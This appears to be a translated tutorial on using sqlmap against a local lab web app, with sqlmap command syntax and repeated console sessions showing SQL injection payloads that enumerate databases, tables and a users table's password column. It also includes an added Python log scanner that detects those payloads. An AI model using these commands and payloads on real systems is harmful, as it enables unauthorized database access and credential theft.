Vulnerability Principles, MySQL Injection: Using the sqlmap Tool on Windows


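sqlmap is an open-source, automated SQL injection tool used to detect and exploit SQL injection vulnerabilities in web applications. The following is a summary of how the tool is used:

  1. Installation and configuration: First download and install sqlmap. Once it is installed, the tool can be used through the command line or a graphical user interface. The tool can be configured by editing the sqlmap.conf file.

  2. Target selection: Before using sqlmap, choose the target to test. The target URL or IP address can be specified with command-line parameters or through the graphical user interface.

  3. Testing the target: Run sqlmap against the target and the tool checks whether an SQL injection vulnerability exists. Test options such as the test type, POST data and cookies can be specified with command-line parameters or through the graphical user interface.

  4. Exploitation: If sqlmap detects an SQL injection vulnerability in the target, the vulnerability can be used to carry out various operations, such as retrieving database information, executing system commands and uploading files. Exploitation options can be specified with command-line parameters or through the graphical user interface.

  5. Result analysis: sqlmap produces a detailed test report showing the results of exploitation and the possible scope of the vulnerability's impact. The output format and level of detail can be specified with command-line parameters or through the graphical user interface.

  6. Advanced features: sqlmap also offers some advanced features, such as specifying a proxy server, setting HTTP headers and using multiple threads. These can be configured with command-line parameters or through the graphical user interface.

sqlmap is a powerful SQL injection tool, but its use raises legal and ethical questions. Obtain lawful authorization before testing, and comply with the relevant laws, regulations and ethical guidelines.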

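Installing sqlmap

[Penetration tool] Detailed sqlmap download and installation tutorial for Windows/Linux (illustrated) - CSDN Blog

sqlmap is an open-source tool for automatically detecting and exploiting SQL injection vulnerabilities. It uses SQL injection techniques to probe for and exploit unauthorized access to databases. Some of sqlmap's basic syntax is listed below: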

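  • Specify the target URL: sqlmap -u <target URL>

  • Specify a file containing a list of target URLs: sqlmap -m <target URL list file>

  • Specify an HTTP request file: sqlmap -r <HTTP request file>

  • Specify a cookie: sqlmap -u <target URL> --cookie="<Cookie>"

  • Specify the User-Agent: sqlmap -u <target URL> --user-agent="<User-Agent>"

  • Specify the database management system (DBMS): sqlmap -u <target URL> --dbms="<DBMS>"

  • Specify the injection point level: sqlmap -u <target URL> --dbms="<DBMS>" --level=<injection point level>

  • Search for available databases: sqlmap -u <target URL> --dbms="<DBMS>" --dbs

  • Search for database tables: sqlmap -u <target URL> --dbms="<DBMS>" --dbs --tables

  • Search for the columns in tables: sqlmap -u <target URL> --dbms="<DBMS>" --dbs --tables --columns

  • Retrieve the data in tables: sqlmap -u <target URL> --dbms="<DBMS>" --dbs --tables --columns --dump

These are some of sqlmap's basic commands for detecting and exploiting SQL injection vulnerabilities. Note that using sqlmap to carry out attacks is illegal; it may only be used within the scope of lawful authorization.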
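What requests like these look like from the server side, as an added example that is not part of the original article: a small Python scanner that flags, in Apache combined-format access logs, the four technique shapes sqlmap reports for the lab target in the sessions on this page, plus sqlmap's default User-Agent. The log lines are constructed samples, and the function and label names are this example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format: ip, identity, user, [time], "request", status,
# size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One signature per technique title that sqlmap prints for the lab target.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# sqlmap announces itself in the User-Agent unless --user-agent overrides it.
DEFAULT_UA = re.compile(r"^sqlmap/", re.I)


def classify(line):
    """Return (client_ip, sorted labels) for one log line, or None if unparsable."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    # Payloads arrive percent-encoded; decode the query string before matching.
    query = unquote_plus(urlsplit(m.group("uri")).query)
    labels = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if DEFAULT_UA.match(m.group("ua")):
        labels.append("sqlmap default User-Agent")
    return m.group("ip"), sorted(labels)


def scan(lines):
    """Count flagged requests per client; clients with no hits are omitted."""
    findings = defaultdict(Counter)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            findings[parsed[0]].update(parsed[1])
    return {ip: dict(counts) for ip, counts in findings.items()}


# Constructed sample log lines (not captured traffic). The payloads are
# shortened, percent-encoded forms of the ones shown in the sessions on this page.
BROWSER = '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"'
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2024:17:16:30 +0800] '
    '"GET /news/show.php?id=46 HTTP/1.1" 200 5120 "-" ' + BROWSER,
    '127.0.0.1 - - [28/Jan/2024:17:16:36 +0800] '
    '"GET /news/show.php?id=46%20AND%203601%3D3601 HTTP/1.1" 200 5120 "-" '
    '"sqlmap/1.5.3.16#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [28/Jan/2024:17:16:36 +0800] '
    '"GET /news/show.php?id=46%20AND%20%28SELECT%201384%20FROM%28SELECT%20COUNT'
    '%28%2A%29%2CCONCAT%280x7178717a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM'
    '%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29 HTTP/1.1" '
    '200 812 "-" ' + BROWSER,
    '127.0.0.1 - - [28/Jan/2024:17:16:37 +0800] '
    '"GET /news/show.php?id=46%20AND%20%28SELECT%207504%20FROM%20%28SELECT'
    '%28SLEEP%285%29%29%29YKbR%29 HTTP/1.1" 200 5120 "-" ' + BROWSER,
    '127.0.0.1 - - [28/Jan/2024:17:16:37 +0800] '
    '"GET /news/show.php?id=-2063%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL'
    '--%20- HTTP/1.1" 200 4990 "-" ' + BROWSER,
    'not an access log line',
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, counts)
```

Because `--user-agent` replaces the default header, the payload signatures carry the detection; values sent in POST bodies or cookies do not appear in a combined-format access log at all.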


1. Get server information, including the operating system, database, web container and back-end language # python sqlmap.py -u url


D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:30:02 /2024-01-28/

[17:30:02] [INFO] resuming back-end DBMS 'mysql'
[17:30:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:30:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:30:05] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:30:05] [WARNING] your sqlmap version is outdated

[*] ending @ 17:30:05 /2024-01-28/

2. Get the list of database names # python sqlmap.py -u url --dbs

3. Get the name of the current database # python sqlmap.py -u url --current-db


D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.3.16#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:31:45 /2024-01-28/

[17:31:45] [INFO] resuming back-end DBMS 'mysql'
[17:31:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:31:47] [INFO] fetching current database
[17:31:52] [INFO] resumed: 'news'
current database: 'news'
[17:31:52] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:31:52] [WARNING] your sqlmap version is outdated

[*] ending @ 17:31:52 /2024-01-28/

4. Get the names of all tables in the current database # python sqlmap.py -u url -D <database name> --tables

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:28:40 /2024-01-28/

[17:28:40] [INFO] resuming back-end DBMS 'mysql'
[17:28:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:28:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:28:42] [INFO] fetching tables for database: 'news'
[17:28:48] [WARNING] the SQL query provided does not return any output
[17:28:48] [INFO] resumed: 'news_article'
[17:28:48] [INFO] resumed: 'news_category'
[17:28:48] [INFO] resumed: 'news_file'
[17:28:48] [INFO] resumed: 'news_friendlink'
[17:28:48] [INFO] resumed: 'news_message'
[17:28:48] [INFO] resumed: 'news_notice'
[17:28:48] [INFO] resumed: 'news_page'
[17:28:48] [INFO] resumed: 'news_users'
Database: news
[8 tables]
+-----------------+
| news_article    |
| news_category   |
| news_file       |
| news_friendlink |
| news_message    |
| news_notice     |
| news_page       |
| news_users      |
+-----------------+

[17:28:48] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:28:48] [WARNING] your sqlmap version is outdated

[*] ending @ 17:28:48 /2024-01-28/

5. Get the column names of a specified table in the current database # python sqlmap.py -u url -D <database name> -T <table name> --columns

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T news_users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:27:52 /2024-01-28/

[17:27:52] [INFO] resuming back-end DBMS 'mysql'
[17:27:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:27:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:27:55] [INFO] fetching columns for table 'news_users' in database 'news'
[17:28:01] [WARNING] the SQL query provided does not return any output
[17:28:01] [INFO] resumed: 'userid'
[17:28:01] [INFO] resumed: 'int(11)'
[17:28:01] [INFO] resumed: 'username'
[17:28:01] [INFO] resumed: 'varchar(20)'
[17:28:01] [INFO] resumed: 'password'
[17:28:01] [INFO] resumed: 'varchar(32)'
Database: news
Table: news_users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
| userid   | int(11)     |
| username | varchar(20) |
+----------+-------------+

[17:28:01] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:28:01] [WARNING] your sqlmap version is outdated

[*] ending @ 17:28:01 /2024-01-28/

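6. Get the values of specified columns in a specified table of a specified database # python sqlmap.py -u url -D <database name> -T <table name> -C <column name 1>,<column name 2>... --dump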

Microsoft Windows [版本 10.0.22621.3007]
(c) Microsoft Corporation。保留所有权利。

D:\sqlmap>dir
 驱动器 D 中的卷没有标签。
 卷的序列号是 C25F-A169

 D:\sqlmap 的目录

2023/11/17  15:37    <DIR>          .
2021/03/18  18:40               275 .gitattributes
2021/03/18  18:40    <DIR>          .github
2021/03/18  18:40                77 .gitignore
2021/03/18  18:40            16,703 .pylintrc
2021/03/18  18:40               402 .travis.yml
2021/03/18  18:40             2,092 COMMITMENT
2021/03/18  18:40    <DIR>          data
2021/03/18  18:40    <DIR>          doc
2021/03/18  18:40    <DIR>          extra
2021/03/18  18:40    <DIR>          lib
2021/03/18  18:40            18,886 LICENSE
2023/11/17  15:28                25 payload.txt
2021/03/18  18:40    <DIR>          plugins
2021/03/18  18:40             5,019 README.md
2021/03/18  18:40            21,731 sqlmap.conf
2021/03/18  18:40            21,928 sqlmap.py
2021/03/18  18:40             2,783 sqlmapapi.py
2021/03/18  18:40    <DIR>          tamper
2021/03/18  18:40    <DIR>          thirdparty
              11 个文件         89,921 字节
               9 个目录 247,544,782,848 可用字节

D:\sqlmap>sqlmap.py
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help

Press Enter to continue...
[17:13:44] [WARNING] your sqlmap version is outdated

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.3.16#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:15:02 /2024-01-28/

[17:15:05] [INFO] resuming back-end DBMS 'mysql'
[17:15:05] [INFO] testing connection to the target URL
[17:15:07] [INFO] testing if the target URL content is stable
[17:15:09] [INFO] target URL content is stable
[17:15:09] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--forms --crawl=2'
[17:15:09] [WARNING] your sqlmap version is outdated

[*] ending @ 17:15:09 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:16:35 /2024-01-28/

[17:16:35] [INFO] resuming back-end DBMS 'mysql'
[17:16:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:16:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:16:38] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:16:38] [WARNING] your sqlmap version is outdated

[*] ending @ 17:16:38 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  -dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:17:13 /2024-01-28/

[17:17:13] [INFO] resuming back-end DBMS 'mysql'
[17:17:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:17:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:17:15] [INFO] fetching database names
[17:17:22] [WARNING] the SQL query provided does not return any output
[17:17:22] [INFO] resumed: 'information_schema'
[17:17:22] [INFO] resumed: 'challenges'
[17:17:22] [INFO] resumed: 'mydb'
[17:17:22] [INFO] resumed: 'mysee'
[17:17:22] [INFO] resumed: 'mysql'
[17:17:22] [INFO] resumed: 'news'
[17:17:22] [INFO] resumed: 'performance_schema'
[17:17:22] [INFO] resumed: 'pikachu'
[17:17:22] [INFO] resumed: 'pkxss'
[17:17:22] [INFO] resumed: 'security'
[17:17:22] [INFO] resumed: 'test'
available databases [11]:
[*] challenges
[*] information_schema
[*] mydb
[*] mysee
[*] mysql
[*] news
[*] performance_schema
[*] pikachu
[*] pkxss
[*] security
[*] test

[17:17:22] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:17:22] [WARNING] your sqlmap version is outdated

[*] ending @ 17:17:22 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current -db
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

Usage: sqlmap.py [options]

sqlmap.py: error: ambiguous option: --current (--current-db, --current-user?)

Press Enter to continue...
[17:17:50] [WARNING] your sqlmap version is outdated

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46  --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:18:06 /2024-01-28/

[17:18:07] [INFO] resuming back-end DBMS 'mysql'
[17:18:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:18:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:18:09] [INFO] fetching current database
[17:18:13] [INFO] resumed: 'news'
current database: 'news'
[17:18:13] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:18:13] [WARNING] your sqlmap version is outdated

[*] ending @ 17:18:13 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.3.16#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:19:01 /2024-01-28/

[17:19:01] [INFO] resuming back-end DBMS 'mysql'
[17:19:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46 AND 3601=3601

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=46 AND (SELECT 1384 FROM(SELECT COUNT(*),CONCAT(0x7178717a71,(SELECT (ELT(1384=1384,1))),0x716b766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=46 AND (SELECT 7504 FROM (SELECT(SLEEP(5)))YKbR)

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-2063 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717a71,0x694446736c5547555050536a4d6f467048454c56556858664a7277796b49534e5372627667587061,0x716b766a71),NULL,NULL,NULL,NULL-- -
---
[17:19:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[17:19:03] [INFO] fetching tables for database: 'news'
[17:19:09] [WARNING] the SQL query provided does not return any output
[17:19:09] [INFO] resumed: 'news_article'
[17:19:09] [INFO] resumed: 'news_category'
[17:19:09] [INFO] resumed: 'news_file'
[17:19:09] [INFO] resumed: 'news_friendlink'
[17:19:09] [INFO] resumed: 'news_message'
[17:19:09] [INFO] resumed: 'news_notice'
[17:19:09] [INFO] resumed: 'news_page'
[17:19:09] [INFO] resumed: 'news_users'
Database: news
[8 tables]
+-----------------+
| news_article    |
| news_category   |
| news_file       |
| news_friendlink |
| news_message    |
| news_notice     |
| news_page       |
| news_users      |
+-----------------+

[17:19:09] [INFO] fetched data logged to text files under 'C:\Users\MZFAITHDREAM\AppData\Local\sqlmap\output\127.0.0.1'
[17:19:09] [WARNING] your sqlmap version is outdated

[*] ending @ 17:19:09 /2024-01-28/

D:\sqlmap>python sqlmap.py -u  http://127.0.0.1/news/show.php?id=46 -D news -T -columns
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.3.16#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:19:57 /2024-01-28/

[17:19:58] [INFO] resuming back-end DBMS 'mysql'
[17:19:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
